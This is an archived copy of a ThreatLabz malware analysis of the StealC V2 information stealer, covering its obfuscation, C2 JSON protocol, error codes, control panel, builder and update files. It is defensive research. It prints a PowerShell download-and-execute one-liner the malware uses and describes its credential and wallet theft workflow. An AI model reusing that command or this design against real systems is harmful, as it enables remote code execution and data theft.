{
	"id": "a92b07e6-84e4-41db-9eef-c15a47c39481",
	"created_at": "2026-04-06T00:12:44.917609Z",
	"updated_at": "2026-04-10T13:12:40.151005Z",
	"deleted_at": null,
	"sha1_hash": "b197e2407d30577e4f552b7169deccabd78f5bcd",
	"title": "I StealC You: Tracking the Rapid Changes To StealC | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 574202,
	"plain_text": "I StealC You: Tracking the Rapid Changes To StealC | ThreatLabz\r\nBy ThreatLabz\r\nPublished: 2025-05-01 · Archived: 2026-04-05 12:37:59 UTC\r\nTechnical Analysis\r\nA thorough technical analysis of StealC V2 was published by another researcher. However, in the following\r\nsections, we delve into additional technical information that complements prior open source reporting.\r\nSimilar to StealC V1, many StealC V2 samples are packed using Themida, a commercial code protection tool,\r\nwhich is designed to hinder reverse engineering. Additionally, the malware obfuscates nearly all the strings it uses\r\nduring execution and employs a two-stage deobfuscation process, which was also observed in StealC V1.\r\nThe following matrix shows a comparison between features available in StealC V1 and StealC V2. \r\n \r\nStealC Version\r\n1\r\nStealC Version 2\r\nAnti-VM checks Yes No\r\nSupports specifying a custom port or using HTTPS Yes No\r\nEstablishes persistence No No\r\nDownloads third-party DLLs from the C2 server Yes No\r\nExecutes DLL payloads  Yes No\r\nExecutes EXE payloads Yes Yes\r\nExecutes MSI files payloads No Yes\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 1 of 14\n\nStealC Version\r\n1\r\nStealC Version 2\r\nExecutes PowerShell script payloads No Yes\r\nCompiled for x64 architectures No Yes\r\nUses RC4 encryption for network communications No\r\nYes (implemented in\r\n2.1.1)\r\nDecrypts stolen data server-side No Yes\r\nSupports Chrome v20 application bound encryption No Yes\r\nEnables victim screenshot capture with multi-monitor support No Yes\r\nSupports unified file grabber functionality No Yes\r\nStreamlines and improves the control panel with an\r\nintegrated builder\r\nNo Yes\r\nTable 1: A matrix comparing features available in StealC V1 and StealC V2.\r\nDuring the initial execution, StealC V2 decrypts important strings using a hardcoded RC4 key, along with an\r\nexpiration date and information required for API resolution. If the current date is past the expiration date, the\r\nmalware will terminate itself. The malware’s strings are stored in Base64 format and decrypted using RC4\r\nencryption with a unique hardcoded key. Although the hardcoded keys may vary between samples, the builder\r\nintegrated into the control panel does not change this RC4 key. Instead, the StealC V2 support team manages key\r\nupdates for their clients as we will discuss later.\r\nStealC V2 performs several validation steps in addition to the expiration date, including ensuring no duplicate\r\ninstances are running, and the system language cannot be a language spoken in the Commonwealth of\r\nIndependent States (CIS). At this point, the second deobfuscation routine takes place, decoding configuration\r\nstrings such as the host and URL path of the C2 server, along with additional API DLLs and function names for\r\nfuture use during execution.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 2 of 14\n\nThose API functions are contained in the DLLs below:\r\nkernel32.dll\r\nadvapi32.dll\r\ngdiplus.dll\r\ncrypt32.dll\r\ngdi32.dll\r\nrstrtmgr.dll\r\nole32.dll\r\nwinhttp.dll\r\nuser32.dll\r\nshlwapi.dll\r\nshell32.dll\r\nntdll.dll\r\nnss3.dll\r\nwininet.dll\r\nNotably, unlike V1, StealC V2 does not include strings related to virtual machine environments. StealC V2 also no\r\nlonger makes requests to the C2 server to download third-party DLLs that were required for information stealing\r\nfunctionality.\r\nNew features\r\nStealC V1 was capable of executing EXE and DLL files. StealC V2 now supports downloading and executing\r\npayloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell\r\nscripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this\r\nfunctionality can be triggered either before or after the data-stealing functions. The table below describes how\r\neach payload is executed.\r\nPayload\r\nType\r\nExecution Method\r\nEXE files\r\nExecuted using the Windows API function ShellExecuteEx with up to 10 retry attempts if\r\nexecution fails.\r\nMSI files\r\nInstalled using msiexec.exe with the silent  /passive parameter, allowing for minimal user\r\ninteraction. The malware retries up to 10 times if installation fails.\r\nPowerShell\r\nscripts\r\nExecutes a remote PowerShell script via the commandpowershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]') . If the execution fails, no retries are\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 3 of 14\n\nPayload\r\nType\r\nExecution Method\r\nattempted.\r\nTable 2: New payload execution types supported by StealC V2.\r\nRC4 encryption\r\nInterestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The\r\nmost recent update has enabled RC4 encryption, indicating that malware is under active development.\r\nUpdated network communication protocol\r\nStealC V2 utilizes standard JSON-based requests and responses for its C2 communication. The figure below\r\nillustrates the workflow of the C2 communication process. \r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 4 of 14\n\nFigure 1: Shows StealC V2’s communications workflow.\r\nRequest\r\nThe C2 server accepts four operation types:  create ,  upload_file ,  done , and  loader . The  create\r\noperation is always the first request, which registers the infection. The initial request always contains a bot ID\r\n(HWID) and the botnet ID ( build ), as shown in the example below.\r\n{\r\nbuild: \"main1\",\r\nhwid: \"A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330\",\r\ntype: \"create\"\r\n}\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 5 of 14\n\nThe HWID creation is based on the volume serial number from the system’s drive letter (or C: by default) and\r\nconsists of 32 hexadecimal characters in a UUIDv4 format. \r\nResponse\r\nThe response from the C2 server contains essential elements that define the malware’s behavior and operational\r\ntasks. It includes the  access_token , which the malware uses for all subsequent requests, as well as flags that\r\nspecify target configurations, such as browser settings for data theft, crypto plugins for search and exfiltration, and\r\nfiles to target (e.g., cryptocurrency wallets, Steam, Outlook). Steam and Outlook paths are hardcoded into the\r\nbinary, and their data is exfiltrated if the corresponding flags are enabled.\r\nOne notable feature in the C2 server's response is the inclusion of a random parameter, which adds variability to\r\neach message. This string consists of hexadecimal characters and ranges from 10 to 15 hexadecimal lowercase\r\ncharacters in length (e.g.,  c689cbd9ecfa3cc in the example below). This random key-value pair plays a critical\r\nrole for RC4 encrypted messages that ensures that each message is unique (even though the same encryption key\r\nis repeatedly used). This technique is used to avoid static signatures for the responses.\r\nAn example response is shown below:\r\n{\r\n8b31887be2030b7: \"c689cbd9ecfa3cc\",\r\nopcode: \"success\",\r\naccess_token: \"f066fcda843438[..]f666733c11901ae74102df\",\r\nself_delete: 1,\r\ntake_screenshot: 1,\r\nloader: 0,\r\nsteal_steam: 0,\r\nsteal_outlook: 1,\r\nbrowsers: [],\r\nplugins: [],\r\nfiles: []\r\n}\r\nEach response contains an opcode field that indicates the result of the request, such as success , blocked ,\r\nerror , or unknown , which are described in the next section.\r\nBased on the panel files, a StealC V2 server generates specific error codes when it detects malformed or\r\nunexpected requests. By comparison, a StealC V1 server responded with an empty message, a  block\r\nnotification, or terminated the connection. The following table outlines the StealC V2 error codes and the\r\nconditions under which they are triggered.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 6 of 14\n\nRequest Explanation Response\r\nAny request\r\nMalformed message (not JSON\r\ncompliant)\r\n{“opcode”: “error”,\r\n“code”: “1000”}\r\nAny request\r\nUnknown packet (unknown type\r\nparameter)\r\n{“opcode”: “unknown”}\r\nAny request Empty parameter or not present {“opcode”: “error”}\r\nAny request\r\nUnencrypted message (after version\r\n2.0.1)\r\n{“opcode”: “block”}\r\nupload_file request,  done\r\nrequest, loader request\r\nEmpty access token {“opcode”: “error5”}\r\nupload_file request\r\nFilename or data parameters not\r\npresent\r\n{“opcode”: “error4”}\r\nupload_file request,  done\r\nrequest, loader request\r\nMalformed or unknown access token {“opcode”: “error1”}\r\nupload_file request File was already sent by the bot {“opcode”: “error3”}\r\nupload_file request Server couldn’t store file {“opcode”: “error2”}\r\ncreate request Empty parameter or not present {“opcode”: “error”}\r\ncreate request\r\nAlready finished communication\r\nprocess or blocked IP\r\n{“opcode”: “blocked”}\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 7 of 14\n\nRequest Explanation Response\r\ncreate request Unable to register bot {“opcode”: “error”}\r\nTable 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.\r\nControl panel and builder\r\nThreatLabz analyzed a StealC V2 C2 panel with an embedded builder as shown in the figure below.\r\nFigure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.\r\nThreatLabz’s in-depth analysis of StealC V2’s infrastructure revealed several key findings:\r\nVersion control enforcement: The builder requires a version update that is provided in a ZIP archive to be\r\nuploaded via the framework's admin settings. This ensures that operators cannot install older versions than\r\nthe most recently applied update.\r\nTelegram bot integration: The control panel supports Telegram bot integration for sending notifications\r\nand allows customization of message formats.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 8 of 14\n\nRule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot\r\ngeolocation, build IDs, markers triggered, or identified software/processes during the information-gathering phase. These rules dictate how payload responses are generated.\r\nOngoing development: The panel is rapidly evolving, with partially implemented features like Firefox\r\nplugin loading. As previously mentioned RC4 encryption for network communication was initially\r\ncommented-out. The recently released update (version 2.2.0) enabled RC4 encryption for network\r\ncommunications.\r\nEndpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data)\r\nsimilar to StealC V1 but now exclusively processes  upload_file commands.\r\nIP and HWID-based blocking: The panel allows operators to block communications based on IP\r\naddresses (or IP masks) and specific HWIDs. Additionally, IP addresses can be automatically blocked for\r\nthe remainder of the day after completing the communication process.\r\nFake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages.\r\nHowever, a researcher noticed this fake response could be used to easily detect StealC V2 servers, and\r\nnewer updates reportedly patched this behavior.\r\nBasic RC4 implementation: Despite the first StealC V2 advertisement claiming to implement a custom\r\nRC4 algorithm, the RC4 implementation used is standard.\r\nThe StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules,\r\ngrabber rules, and markers (markers consist of wildcards that will be triggered if the content of the stolen\r\npasswords or cookies files match) for stolen data. For example, the threat actor could create a marker searching for\r\nstrings containing coinbase.com in the contents of the exfiltrated password and cookies files as shown below. \r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 9 of 14\n\nFigure 3: StealC V2 Marker rule which will search for coinbase.com.\r\nThen the actor can then create a loader rule that will be triggered when the marker matches. So if the victim’s files\r\ncontain the marker’s search terms, the C2 will answer to the loader request with the triggered loader’s URL as\r\nshown in the figure below.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 10 of 14\n\nFigure 4: StealC V2 loader rule creation which will trigger when the Coinbase Marker matches.\r\nThese custom configurations are automatically merged with a build template file, which is a pre-configured StealC\r\nV2 binary.The builder only modifies the  build parameter from the build template, leaving the  build_id\r\nparameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key,\r\nC2 address, and URL path are exclusively managed by the StealC V2 development team. Note that StealC V2\r\ncurrently only supports HTTP communication on port 80.\r\nUpdates\r\nThe figure below shows the update interface in StealC V2’s control panel.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 11 of 14\n\nFigure 5: StealC V2’s panel and builder update menu (with two updates applied).\r\nAfter the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC\r\nseller) and send the control panel domain, the path for network communication, and the RC4 key created at install\r\ntime. After receiving these parameters, the seller creates an update containing a builder template binary configured\r\nwith the parameters from the installation script. Once the operator receives the builder template, they can use the\r\ncontrol panel to create new StealC builds.\r\nThe update file is packaged as a ZIP archive containing the following components:\r\nversion.json: JSON file used by the panel to identify and install the update.\r\nbuild.exe: StealC V2 template binary.\r\nOptional patch files: Additional files that can replace specific existing files in the panel during the update\r\nprocess, ensuring seamless integration of new functionality or fixes.\r\nThe example below shows the contents of a  version.json file. This file contains update information, which is\r\nread by the panel to identify and apply the changes included in the update.\r\n{\r\n \"version\": \"2.2.4\",\r\n \"admin_update\": true,\r\n \"gate_update\": true,\r\n \"db_update\": false,\r\n \"changes\":\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 12 of 14\n\n[\r\n {\"type\": \"gate\", \"description\": \"Fix build block requests v2\"}\r\n ]\r\n}\r\nThe table below describes fields inside the version.json file:\r\nField Description\r\nversion The StealC V2 bot version.\r\nadmin_update A flag that instructs the updater to apply patches to the admin structure folder.\r\ngate_update A flag that directs the updater to apply patches to the gate structure folder.\r\nchanges A list of update messages detailing modifications, displayed within the panel.\r\ndb_update Indicates updates or modifications to the panel's database model, specifically MySQL.\r\nTable 4: Parameters present in StealC V2’s update configuration file.\r\nComparing StealC builds\r\nAfter examining the builder templates included in the C2 panel, we compared different versions and identified key\r\nimprovements in their development. The table below highlights the evolution of StealC across versions:\r\nTemplate\r\nVersion\r\nUpdate File Description\r\n2.0.1 update.stealc_update\r\nNo obfuscation. All strings are stored in plaintext.\r\nOnly a subset of API functions are resolved.\r\nNo RC4 keys.\r\nUses winhttp.dll APIs for communication.\r\nConfiguration parameters are hardcoded.\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 13 of 14\n\nTemplate\r\nVersion\r\nUpdate File Description\r\n2.0.1 2.0.0.stealc_update\r\nImplemented obfuscation.\r\nAdded RC4 key to decrypt the malware’s strings.\r\nAll API functions are resolved at runtime.\r\nFeatures a distinct structure that sets it apart from other\r\nversions.\r\nEncrypts configuration parameters using RC4.\r\n2.1.1 2.1.1.stealc_update\r\nFeatures a code structure similar to more recent samples.\r\nFirst version using encryption/decryption routines for\r\nnetwork communication with a single RC4 key that is also\r\nused for decrypting the malware’s strings.\r\n2.1.3 2.1.2.stealc_update Identical to version 2.1.1.\r\n2.2.4 2.0.1.stealc_update\r\nIncludes an RC4 key for string decryption and another\r\nRC4 key for network encryption.\r\nImproved download of payloads (based on winhttp instead\r\nof wininet.dll).\r\nAdded autodelete command.\r\nTable 5: Differences among the StealC V2 bot templates present in several update files.\r\nAdditionally, the latest version  includes a self-delete routine, triggered based on the configuration flag\r\n( self_delete ) received from the C2 server, which is very similar to the routine that StealC V1 used to erase the\r\ndownloaded DLLs.\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nhttps://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc"
	],
	"report_names": [
		"i-stealc-you-tracking-rapid-changes-stealc"
	],
	"threat_actors": [],
	"ts_created_at": 1775434364,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.pdf",
		"text": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.txt",
		"img": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.jpg"
	}
}